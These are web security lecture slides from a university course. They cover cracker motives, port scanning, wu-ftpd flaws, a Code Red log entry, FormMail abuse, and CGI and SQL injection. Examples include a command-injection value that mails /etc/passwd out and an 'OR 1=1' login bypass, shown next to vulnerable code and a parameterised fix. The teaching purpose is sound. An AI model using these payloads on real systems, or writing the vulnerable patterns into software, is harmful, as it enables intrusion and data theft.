COMP249: Web Security

Steve Cassidy

Web Security and Privacy

What are the security and privacy issues on the internet/web?
- Security: Avoid intrusion/damage
- Privacy: Protect private information (e.g. credit card transactions)
How could your web server be compromised? What can you do to prevent it?
Are you at risk as a web user? What can you do to safeguard yourself/your clients?
How can a web service protect the integrity of its data and offer secure transactions to users?

Cracker Motivations

What would a cracker want to do?
- See things on your system that are hidden
- Store things on your system without you knowing (warez)
- Attack your users
- Use your system as a stepping stone to other more interesting servers
- Deface or otherwise damage your server
- Just crack because it's there (pwned)

An Example

The FBI released a warning to websites using shopping cart software named "PDG," which was utilized by roughly 4,000 websites, after a devastating bug was found that reveals all the company's customer information. One website, SawyerDesign.com, had purchased the software from a reseller leaving them out of touch from the notifications sent to direct customers. Once the site was discovered by carders, they had a field day racking up thousands of dollars on customers credit cards ranging from long distance cards to domain names. (source www.hackinthebox.org)

How to Crack a Server

Cracking a web server means gaining some kind of unauthorised access to the server
The first requirement is a communication channel with the server. Use port scanning to find open internet ports on the server and which server programs are running
Having found a channel we need to exploit it to either run a program on the server or read useful files such as the password file

How to Crack a Server

Exploits typically take advantage of bugs or poor coding in servers or associated programs. Eg. a CGI script which doesn't check its input properly
If we have the password file we can attempt to guess the passwords from a dictionary. If we have a password we can gain user level access to the system
Alternately, we try to run a program on the server which exploits a system bug giving us root privileges and add ourselves as new superuser account

Open Internet Ports

Internet servers, particularly Unix servers, are configured with many internet services active by default

Each service is allocated a TCP or UDP port; eg:

ftp             21/tcp 
telnet          23/tcp 
finger          79/tcp          # Get info on users
www             80/tcp          # WorldWideWeb HTTP
pop3            110/tcp         # PostOffice Protocol
irc             194/tcp         # Internet Relay Chat

Each open port is associated with a server program; eg. Apache for port 80, wuftpd for port 21
Knowing what servers are running means we can look for standard exploits of these programs or try to find new ones

Open Internet Ports

You can use telnet to connect to any tcp port and gain some information about the server program:

%  telnet ftp.mq.edu.au 21
Trying 137.111.1.11...
Connected to sunb.ocs.mq.edu.au.
Escape character is '^]'.
220-
220-  This is the Macquarie University anonymous ftp server.
220-  All transfers are logged, if you don't like this policy then
220-  disconnect now.
220-
220-
220 sunb FTP server (Version wu-2.6.1(2) Sat Dec 1 11:33:49 EST 2001) ready.

We now know that ftp.mq.edu.au runs version 2.6.1 or wu-ftpd

Exploiting Security Holes

Large programs have bugs; bugs lead to security holes; most internet servers are large programs
The aim of an exploit is to either access system files (passwords) or run code on the system
Two classes of exploit are: buffer overflows and taking advantage of poor coding in server programs or CGI scripts
Buffer overflows occur when the amount of data sent as input is larger than a predefined buffer size in the server program. The cracker can place code in the overflowed area which may then be run by the program
The most useful examples of poor coding are where servers or cgi programs call other programs, in particular shell scripts

WU-FTPD Exploit

WU-FTPD File Globbing Denial of Service Vulnerability: Remote exploitation of an input validation vulnerability in version 2.6.2 of WU-FPTD could allow for a denial of service of the system by resource exhaustion. The vulnerability specifically exists in the wu_fnmatch() function in wu_fnmatch.c. When a pattern containing a '*' character is supplied as input, the function calls itself recursively on a smaller substring. By supplying a string which contains a large number of '*' characters, the system will take a long time to return the results, during which time it will be using a large amount of CPU time.

Buffer Overflow Exploit

Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. (Source: SecurityFocus.com) SecurityFocus.com provides example C programs which take advantage of this exploit

From a Logfile

This line is taken from a web server logfile. It shows an attempted exploit of an IIS security hole (one of the Code Red family I think)

202.127.1.24 - - [12/May/2002:07:32:32 +1000] "GET /default.ida?NNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  
HTTP/1.0" 400 329 "-" "-"

Exploiting CGI Scripts

Many web servers come with some example scripts which show CGI features but which are vulnerable if left in place.
Other programs are widely used, eg. discussion servers, web mail forms, etc. Knowing that they are there enables exploits to be attempted

Exploiting CGI Scripts

For example if the input to is "steve@foo.com ; mail steve@foo.com < /etc/passwd":

to = form['to']
subj = form['subj']
body = form['body']
exec("echo '$body' | /usr/bin/mail -s $subj $to")

the command run by the CGI script is:

echo 'some message' | /usr/bin/mail -s crack steve@foo.com ;\
            mail steve@foo.com < /etc/passwd

An Example CGI Exploit

Security Tracker describes an exploit to a common script formmail.pl which sends email via a web form
The script trusts its input and sends a mail, this allows SPAM email to be sent via the form

From the web server log:

64-187-39-131.powergate.ca - - [20/Feb/2003:11:46:32 +1100]
"GET http://www.shlrc.mq.edu.au/cgi-bin/FormMail.cgi?
email=FormMail@mail.com&recipient=<formmailss@aol.com>
shlrc.mq.edu.au&subject=www.shlrc.mq.edu.au/cgi-bin/FormMail.cgi
&=date/time:Wed/Feb/19/7:46pm HTTP/1.0" 404 214 "-" "Mozilla/??"

SQL Injection

SQL Injection is a form of CGI exploit that takes advantage of poorly coded database interfaces.
Allows access to the server database, to insert, delete or retrieve data
Some database systems can allow remote execution of arbitrary programs
Well developed techniques and systems for finding vulnerabilities
- Example exploit on YouTube
- sqlmap is an open source SQL injection tool

SQL Injection

user = form.get_value("user")
password = form.get_value("password")
query = "SELECT * FROM users WHERE user='"+user"' AND password='"+password+"'"
cur.execute(query)
...

If user="hacker" and password="' OR 1=1 --":

SELECT * FROM users WHERE user='hacker' AND password='' OR 1=1 --'

SQL Injection

user = form.get_value("user")
password = form.get_value("password")
query = "SELECT * FROM users WHERE user=? AND password=?"
cur.execute(query, (user, password))
...

If user="hacker" and password="' or 1=1 --":

SELECT * FROM users WHERE user='hacker' AND password='\' or 1=1 --'